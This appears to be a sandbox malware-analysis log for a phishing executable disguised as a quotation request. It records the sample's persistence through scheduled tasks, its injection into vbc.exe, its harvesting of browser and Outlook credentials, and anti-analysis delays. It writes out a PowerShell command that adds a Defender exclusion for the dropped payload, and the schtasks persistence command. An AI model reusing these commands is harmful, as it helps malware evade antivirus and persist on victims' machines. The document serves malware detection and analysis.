                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9C5C.tmpJump to behavior
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: vbc.exe, 00000007.00000002.4059070573.0000000007629000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000071C8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ReversingLabs: Detection: 39%
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, File read: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                  Source: unknown, Process created: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: unknown, Process created: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder, Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: SnHY.pdb source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: Binary string: SnHY.pdbSHA256 source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: 0x9F119049 [Mon Jul 27 01:26:33 2054 UTC]
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_024DDA70 push eax; retf 0_2_024DDA71
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_04D3ABA1 push 34052815h; retf 0_2_04D3ABAD
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 0_2_0763D710 push esp; retf 0_2_0763D711
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F9C30 push esp; retf 0728h7_2_053F9D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F8DDF push esp; iretd 7_2_053F8DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F8C2F pushfd ; iretd 7_2_053F8C30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F891E pushad ; iretd 7_2_053F891F
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 8_2_024ADA70 push eax; retf 8_2_024ADA71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0A8F3862 push E809A25Eh; ret 12_2_0A8F3869
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: section name: .text entropy: 7.772032192483331
                  Source: vTAuFgZcVE.exe.0.drStatic PE information: section name: .text entropy: 7.772032192483331
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeFile created: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeJump to dropped file

                  Boot Survival

                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: 24D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: 2690000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: 4690000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: 9380000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: A380000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: A5C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Memory allocated: B5C0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 53F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 7370000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 72C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: 24A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: 2610000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: 4610000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: 8E40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: 9E40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: A060000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Memory allocated: B060000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 5500000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 6F10000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 5560000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597047
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596171
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595952
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595841
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595296
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595077
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594640
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599452
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 599015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598795
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598576
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597479
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 597022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596465
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596121
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 596000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 595015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 594578
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6959Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2590Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4208Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 5650Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2856
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 6995
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: vbc.exe, 00000007.00000002.4056435087.00000000057B6000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4055777550.0000000005418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.0000000007FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: vbc.exe, 0000000C.00000002.4065311870.00000000082C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_09DB9548 LdrInitializeThunk,7_2_09DB9548
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
